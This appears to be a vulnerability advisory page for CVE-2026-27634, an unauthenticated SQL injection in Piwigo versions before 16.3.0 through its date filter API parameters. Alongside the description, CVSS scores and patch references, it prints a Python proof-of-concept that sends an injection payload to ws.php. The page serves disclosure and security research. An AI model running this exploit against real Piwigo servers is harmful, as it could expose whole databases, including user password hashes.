Security Vulnerability Report
CVE-2026-27634 CVSS 9.8 CRITICAL

CVE-2026-27634

Published: 2026-04-03 22:16:26
Last Modified: 2026-04-09 21:14:23

Description

Piwigo is an open source photo gallery application for the web. Prior to version 16.3.0, the four date filter parameters (f_min_date_available, f_max_date_available, f_min_date_created, f_max_date_created) in ws_std_image_sql_filter() are concatenated directly into SQL without any escaping or type validation. This could result in an unauthenticated attacker reading the full database, including user password hashes. This issue has been patched in version 16.3.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* - VULNERABLE
Piwigo < 16.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Proof of Concept for CVE-2026-27634
# This script demonstrates the SQL injection vulnerability in Piwigo < 16.3.0
# The vulnerability exists in the date filter parameters of the web service API.


def exploit_piwigo_sqli(target_url):
    """
    Attempts to exploit the SQL injection vulnerability in Piwigo.
    """
    # The vulnerable endpoint is typically the web service (ws.php)
    endpoint = f"{target_url}/ws.php"

    # SQL Injection payload: Using a simple logical check to demonstrate the vulnerability
    # This payload attempts to make the condition TRUE, potentially returning all records.
    # In a real scenario, this would be a UNION SELECT or blind injection payload.
    sqli_payload = "2024-01-01' OR '1'='1"

    parameters = {
        "method": "pwg.images.search",  # Common method triggering the filter
        "f_min_date_available": sqli_payload,
        "format": "json",
    }

    try:
        print(f"[+] Sending payload to {endpoint}")
        response = requests.get(endpoint, params=parameters, timeout=10)

        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response content (first 500 chars):")
            print(response.text[:500])

            # Analyze response to confirm vulnerability (heuristic)
            if "images" in response.text or "result" in response.text:
                print("[!] Potential SQL Injection confirmed based on response structure.")
            else:
                print("[!] Response received, but manual verification of data exfiltration is required.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost/piwigo"
    exploit_piwigo_sqli(target)

References

https://github.com/Piwigo/Piwigo/commit/0d5ed1f7778bbe263410446d8cf64594df75bd08 (Patch)
https://github.com/Piwigo/Piwigo/security/advisories/GHSA-mgqc-3445-qghq (Exploit, Vendor Advisory)
https://piwigo.org/release-16.3.0 (Release Notes)

Weakness

CWE-89 (SQL Injection)

CVSS 4.0 (Secondary)

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X